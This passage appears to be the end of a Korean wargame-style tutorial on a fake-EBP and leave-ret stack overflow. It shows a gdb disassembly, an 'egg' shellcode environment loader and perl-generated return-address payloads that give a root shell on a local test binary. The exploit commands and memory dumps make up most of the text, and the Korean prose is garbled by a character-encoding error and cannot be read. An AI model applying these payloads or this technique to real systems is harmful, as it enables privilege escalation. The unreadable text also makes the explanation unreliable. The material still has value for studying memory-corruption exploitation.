0x080485b9 <main+39>:   sub    $0x8,%esp
0x080485bc <main+42>:   push   $0x64
0x080485be <main+44>:   lea    0xfffffffc(%ebp),%eax
0x080485c1 <main+47>:   push   %eax
0x080485c2 <main+48>:   call   0x80483dd <dumpcode>
0x080485c7 <main+53>:   add    $0x10,%esp
0x080485ca <main+56>:   leave  <---------------------���⼭ ebp�� ��ġ�� Ȯ���Ͽ� ret�� �����ϰ� �ȴ�.
0x080485cb <main+57>:   ret    
End of assembler dump.

���� ebp�� fake_ebp(������ ���)�� �ְ�, ret�� leaveret�� ���ԵǸ� fake_ebp�� ��¥ ebp�� �˰� ret�� ��ġ�� �ٲ�Եȴ�.
[--------����--------][ebp][ret] ���⼭ ebp�� ret�� fake_ebp�� leaveret�� ä���
[--------����--------][fake_ebp][leaveret]�� ���� �ȴ�.

�׷� fake_ebp�� ��� ������� ������?
������ ���͸��ϰų�, ���ް��� ���͸��� ��, �̸� ���ϱ� ���� ����� �� �ִ�.
test�� ������ ������ ret�� �ٲ� �� �ִٴ°͸� �˾ƺ����� ����.

egg�� ������ �ۼ��� ���ڵ带 ������ �۾��Ѵ�.

[w0rm9@RealSkulls WGD]$ ./egg
Using address: 0xbffffa98
[w0rm9@RealSkulls WGD]$ ./test `perl -e 'print "\x98\xfa\xff\xbf\xac\xf1\xff\xbf\xca\x85\x04\x08"'`
0xbffff1d4  98 fa ff bf ac f1 ff bf ca 85 04 08 00 00 00 00   ................
0xbffff1e4  24 f2 ff bf 30 f2 ff bf 2c 58 01 40 02 00 00 00   $...0...,X.@....
0xbffff1f4  e4 82 04 08 00 00 00 00 05 83 04 08 92 85 04 08   ................
0xbffff204  02 00 00 00 24 f2 ff bf cc 85 04 08 fc 85 04 08   ....$...........
0xbffff214  60 c6 00 40 1c f2 ff bf 00 00 00 00 02 00 00 00   `..@............
0xbffff224  1a f3 ff bf 21 f3 ff bf 00 00 00 00 2e f3 ff bf   ....!...........
0xbffff234  46 f3 ff bf                                       F...
���׸����̼� ����
[w0rm9@RealSkulls WGD]$ ./test `perl -e 'print "\x98\xfa\xff\xbf\xd0\xf1\xff\xbf\xca\x85\x04\x08"'`
0xbffff1d4  98 fa ff bf d0 f1 ff bf ca 85 04 08 00 00 00 00   ................
0xbffff1e4  24 f2 ff bf 30 f2 ff bf 2c 58 01 40 02 00 00 00   $...0...,X.@....
0xbffff1f4  e4 82 04 08 00 00 00 00 05 83 04 08 92 85 04 08   ................
0xbffff204  02 00 00 00 24 f2 ff bf cc 85 04 08 fc 85 04 08   ....$...........
0xbffff214  60 c6 00 40 1c f2 ff bf 00 00 00 00 02 00 00 00   `..@............
0xbffff224  1a f3 ff bf 21 f3 ff bf 00 00 00 00 2e f3 ff bf   ....!...........
0xbffff234  46 f3 ff bf                                       F...
sh-2.05b# id
uid=0(root) gid=5013(w0rm9) groups=5013(w0rm9),11(RSRoot),10(wheel)

���� ����. ���� 4����Ʈ�ȿ� egg�� �ּҸ� �ְ�, ebp���� 4����Ʈ�� �պκ�(0xbffff1d4)�� �ִ´�.
�׸��� ret�� leaveret�� �ּҸ� ������ leaveret�� �Լ��� ebp��ġ�� Ȯ���� �� fake_ebp�� Ȯ���Ͽ� 
RET�� ������ ���̴�. �ٷ� 0xbffff1d4�� RET�� �Ǿ���ȴ�.

�աաաաաաաաաաաաաաաաաաաաաաաաաաաաաաաաաաաաաա�

������������������������������������������������������������������������������
  ��0x06. ��ġ�禢
  ����������������

���ϰ� www.koreahacker.net���� ���ٰ� WGD�� ������¥�� �ٰ��������� �𸣰�,
������ �ϰ� �ִٰ� �η��η� ������ ������ ���뵵 �����ϰ� �´��� Ʋ������ �ǹ�������,
�̷� ������ �ø��ڴ� �β����׿�.
é�� 3�� �ذ����� ���� strcpy������ BOF�� ���� �亯�� ��Ź�帳�ϴ�.
�׷� �׽�Ʈ �Ŀ� �����ؼ� �÷���������. �׸��� ���� WGD�� ������ �̸� ���س���, 
ü�������� �Ϻ��ϰ� ���ظ� �� �� ������ ������ �ؾ߰ڳ׿�.
�ƹ��ɷ� ������ �� �о��ּż� �����մϴ�.

�աաաաաաաաաաաաաաաաաաաաաաաաաաաաաաաաաաաաաա�